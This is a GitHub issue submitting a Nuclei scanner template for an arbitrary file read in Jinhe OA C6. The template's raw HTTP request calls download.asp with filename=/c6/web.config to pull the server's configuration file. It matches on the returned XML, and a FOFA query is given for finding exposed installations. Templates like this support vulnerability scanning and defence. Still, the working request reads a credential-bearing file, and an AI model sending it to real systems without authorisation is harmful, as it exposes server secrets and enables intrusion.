### ISSUE TITLE
jinhe-oa-c6-download-arbitrary-file-read

### ISSUE THREAD

**Issue by SleepingBag945** [projectdiscovery/nuclei-templates#7990]
### Template Information:

jinhe-oa-c6-download-arbitrary-file-read
app="金和网络-金和OA"

### Nuclei Template:

```yaml
id: jinhe-oa-c6-download-arbitrary-file-read

info:
  name: jinhe-oa-c6-download-arbitrary-file-read
  author: SleepingBag945
  severity: medium
  description: |
    金和OA C6 download.asp文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器中的敏感信息
  metadata:
    fofa-query: app="金和网络-金和OA"

http:
  - raw:
      - |
        GET /C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config  HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1,"xml version=") && contains(body_1,"<configuration>")'
        condition: and
```
